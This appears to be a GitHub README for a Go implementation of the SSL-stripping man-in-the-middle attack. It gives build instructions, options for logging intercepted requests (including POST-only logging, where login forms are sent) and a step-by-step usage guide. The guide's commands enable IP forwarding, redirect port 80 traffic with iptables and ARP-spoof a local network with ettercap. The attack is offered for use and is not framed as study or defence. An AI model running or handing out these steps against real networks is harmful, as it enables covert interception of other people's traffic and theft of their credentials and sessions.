/sslstrip

A MITM tool that implements SSL stripping attack.

Primary LanguageGoMIT LicenseMIT

Sslstrip

This is a tool that implements Moxie Marlinspike's SSL stripping attacks, written in Go. Inspired by https://github.com/moxie0/sslstrip.

Requirements

The only requirment is Go. There are no further dependencies, only the standard library of the language. We have used Go version 1.9.2 but it should work fine with other versions as well. Please, open issue if you encounter a problem.

Installing

$ # clone the repo in your $GOPATH/src/sslstrip
$ cd $GOPATH/src/sslstrip/cli
$ go build main.go
$ ./main -h
Usage of ./main:
-filename string
  	the output log file or empty for stdout
-log-response
  	log responses
-port int
  	port to listen on (default 8000)
-post-only
  	log only POST requests

Usage

  1. Flip your machine into forwarding mode (as root):

$ echo "1" > /proc/sys/net/ipv4/ip_forward

  1. Setup iptables to intercept HTTP requests (as root):

$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

  1. Run an arpspoof attack to redirect traffic to your machine. For example with ettercap

$ ettercap -q -T -M arp

  1. Run sslstrip with the command-line options you'd like (see above).

Contributing

If you want to contribute feel free to send a pull request.

Also, if you found a bug or some wrong information in these pages you can open an issue.

License

This program is provided under an MIT open source license, read the LICENSE file for details.